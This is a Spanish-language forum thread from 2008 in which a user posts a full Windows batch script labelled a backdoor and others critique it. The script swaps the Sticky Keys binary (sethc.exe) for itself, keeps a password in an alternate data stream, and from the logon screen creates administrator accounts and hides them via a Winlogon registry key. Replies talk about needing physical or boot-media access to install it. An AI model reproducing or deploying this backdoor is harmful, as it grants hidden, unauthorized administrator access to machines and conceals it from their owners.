Título: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: SmartGenius en 6 Mayo 2008, 03:41 am
Este es un code que estoy realizando... mode con cols=70 mode con lines=20 @echo off title Escalador de Privilegios color 0a
if exist "%windir%\system32\sethc.lz0" (goto load) else (goto ins)
:ins echo. echo Aun no se ha modificado el Sistema.. echo. echo Presione una Tecla para realizar el Procedimiento, o salga echo del programa si lo desea... pause > nul copy "%windir%\system32\sethc.exe" "%windir%\system32\sethc.lz0" del /f "%windir%\system32\sethc.exe" copy %0 "%windir%\system32\sethc.exe" echo ni7vyk3t3hd2mkniyk3nnit>>"%windir%\system32\shell32.dll:admin.cuh" cls echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º El cambio del archivo del Sistema usado para º echo º la Escalada de privilegios se ha realizado º echo º satisfactoriamente, tendra efecto la proxima º echo º vez que vaya a Iniciar sesion... º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo Desea ver la Ayuda del Programa: Si [s] No [N] echo. set /p opc="> " if %opc%==s call :help 2 if %opc%==S call :help 2 if %opc%==n (echo.&echo Gracias por Usar este Programa&pause&exit) if %opc%==N (echo.&echo Gracias por Usar este Programa&pause&exit)
:load cls for /F "tokens=*" %%a in (%windir%\system32\shell32.dll:admin.cuh) do set conf=%%a echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Escalada de Privilegios - CUH el-hacker.com º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo. El Programa se encuentra Protegido echo. Por Favor Introduzca su Clave! set /p q="Password > " call :cript %q% if %v%==%conf% (goto ini) else (cls&echo.&echo Clave Invalida...&echo.&echo Vuelva a Intentarlo&pause&goto load)
:ini cls echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Escalada de Privilegios - CUH el-hacker.com º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo Elija una Opcion: echo. echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³1³ ³ Agregar un Usuario.. ³ ³2³ ³ Esconder un usuario. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³3³ ³ Eliminar un Usuario. ³ ³4³ ³ Ver Ayuda - Creditos ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo ÚÄ¿ ÚÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ¿ echo ³5³ ³ Salir del Programa. ³ echo ÀÄÙ ÀÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÙ echo. set /p opc="> " if "opc"=="" (goto :ini) set opc=%opc: =_% set opc=%opc:&=_% set opc=%opc:¡=_%
if %opc%==1 goto addadmin if %opc%==2 goto hideuser if %opc%==5 goto fin if %opc%==4 call :help 1 if %opc%==3 (goto :delete) else (goto :err)
:err cls echo. echo ERROR... echo. echo No ha escogido una Opcion Correcta echo Vuelva a Intentarlo echo. pause goto ini
:addadmin cls echo. echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo Escriba el Nombre del Nuevo usuario echo ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ echo. set /p admin="> " echo. echo Escriba el la Clave para el Usuario: %admin% echo. set /p clave="> " net user "%admin%" "%clave%" /add net localgroup Administradores %admin% /add echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Usuario Agregado Con Exito º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ pause >nul goto ini
:delete cls echo. echo Escriba El Nombre Del Usuario a Borrar: echo. set /p usdel="> " net user "%usdel%" /delete cls echo. echo Usuario Borrado Con Exito. echo. pause goto ini
:hideuser echo. echo Escrilba la Cuenta o Nombre de Usuario echo que desea esconder de la pantalla de echo Inico de Sesion... echo. set /p hiden="> " reg add "HKLM\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon\SpecialAccount\UserList" /v "%hidden%" /t REG_DWORD /d 0 /f echo. echo El Usuario %hidden% fue Ocultado con Exito... echo. pause goto ini
:help cls echo. echo ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ» echo º Escalada de Privilegios - CUH el-hacker.com º echo ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ echo. echo sección de Ayuda echo ____________ echo ____________ echo ____________ echo ____________ echo Como se pueden dar cuenta, soy malo para las ayudas, echo asi que podrian ayudarme ustedes... echo. echo :: SmartGenius :: - powered by iSmart, Corp. echo. echo Presione Cualquier tecla para continuar ¡ pause > nul if %1==1 set ir=ini if %1==2 set ir=fin goto %ir%
:cript set v=%1 set v=%v:&=_% set v=%v: =_% set v=%v:^=_% set v=%v:#=_% set v=%v:-=t% set v=%v:.=a% set v=%v:a=23% set v=%v:e=ni% set v=%v:h=r% set v=%v:r=y% set v=%v:c=mo% set v=%v:d=z% set v=%v:1=+% set v=%v:2=k% set v=%v:b=na% set v=%v:d=15% set v=%v:m=t3% set v=%v:o=sm% set v=%v:s=hd2% set v=%v:l=7v% goto :eof
:fin echo MsgBox "Gracias por usar este Programa... ;)"^&vbCrLf^&vbCrLf^&"Para mas Info visita"^&vbCrLf^&"http://foro.elhacker.net", 64, "Escalador de Privilegios" >>%temp%\msgr.vbs start %temp%\msgr.vbs exit El pass del programa: Adivinenlo ;D ;D Espero que lo prueben y comenten, pros, contras, errores, arreglos, ayudas, mejoras... Saludos.
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: leogtz en 6 Mayo 2008, 06:20 am
Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.
Saludos.
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: Crazy.sx en 6 Mayo 2008, 13:04 pm
Mmm, voy a ver que onda con esto...
sodulaS :P
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: No_NICK en 7 Mayo 2008, 02:12 am
Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???
Saludos...
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: SmartGenius en 8 Mayo 2008, 21:49 pm
Hola SmartGenius, yo creo que estaria bien que pusieras unos Errorlevel´s al usar los comandos Net, ya que habra veces en las que no siempre se podra agregar o eliminar un usuario, etc.
Saludos.
Aun no tengo muy claro el manejo de errorlevel, pero si tu puedes ayudarme, pues bienvenido sea... Tan solo me gustaría que me respondieras una pregunta ¿ Lo puedes utiliza si no estas logeado como Administrador por ejemplo que estés como invitado ???
Bueno, pues el codigo basicamente es para que reemplace a sethc, por si mismo (ya encapsulado en exe)... y asi al moemento de iniciar sesion uno presiona 5 veces shift y tiene acceso al programa que nos permite crearnos una cuenta de admin... Siendo invitado no estoy seguro de su funcionamiento, pero hay otra forma de escalar privilegios con el comando at que funciona con cualquiera, de ahi podriamos tomar una base para mejorar el codigo y hacerlo mas efectivo... Saludos.
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: No_NICK en 9 Mayo 2008, 02:22 am
Ok... :: SmartGenius :: fíjate para que funcione es necesario tener acceso local a la máquina durante una sesión de Administrador...
Seria tonto entonces utilizar ese BAT pues si ya tienes una sección como administrador para que te vas a tomar la molestia de ejecutarlo ?
Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)
Al igual que el comando at solo serviría si solo si eres administrador y tienes acceso local a la maquina
Ahora bien si lo que deseas es hacer una herramienta que sirva para cambiar el password del administrador en caso de perdida "que es mas o menos lo que tienes ahora" para nada sera un "Escalador de Privilegios"
Saludos amigo, Espero no desanimarte....
...
Título: Re: Escalador de Privilegios - Backdoor - by :: SmartGenius ::
Publicado por: MK-Ultra en 9 Mayo 2008, 02:59 am
Para que tú script tenga una utilidad Verdadera tendrías que crearte un cd, PenDriver ó Diskette de arranque de manera que cuando reinicies puedas modificar el archivo, otra opción seria iniciar sección con un CD de Linux Live y accedes a la partición de Windows y modificas ( en este ultimo caso no te servirá de mucho el .BAT que estas creando)
Agregale que necesitarías acceso físico a la máquina xD
|